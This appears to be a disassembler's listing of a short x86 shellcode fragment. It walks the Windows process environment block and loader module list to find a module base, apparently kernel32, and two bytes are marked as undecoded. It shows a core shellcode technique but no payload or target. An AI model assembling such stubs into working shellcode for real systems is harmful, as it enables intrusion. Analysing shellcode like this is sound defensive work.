0x0        xor eax, eax                        \x31\xc0                  1.        
0x2        xor edx, edx                        \x31\xd2                  1.        
0x4        mov dl, 0x30                        \xb2\x30                  .0        
0x6        mov eax, dword ptr fs:[edx]         \x64\x8b\x02              d..       
0x9        test eax, eax                       \x85\xc0                  ..        
0xb        db 0x78 (!)                        \x78                      x         
0xc        db 0xc0 (!)                        \xc0                      .         
0xd        mov eax, dword ptr [eax + 0xc]      \x8b\x40\x0c              .@.       
0x10       mov esi, dword ptr [eax + 0x1c]     \x8b\x70\x1c              .p.       
0x13       lodsd eax, dword ptr [esi]          \xad                      .         
0x14       mov eax, dword ptr [eax + 8]        \x8b\x40\x08              .@.       
0x17       jmp 0x20                            \xeb\x07                  ..        

0x19       mov eax, dword ptr [eax + 0x34]     \x8b\x40\x34              .@4       
0x1c       lea eax, [eax + 0x7c]               \x8d\x40\x7c              .@|       
0x1f       lea eax, [eax + 0x3c]               \x8d\x40\x3c              .@<       
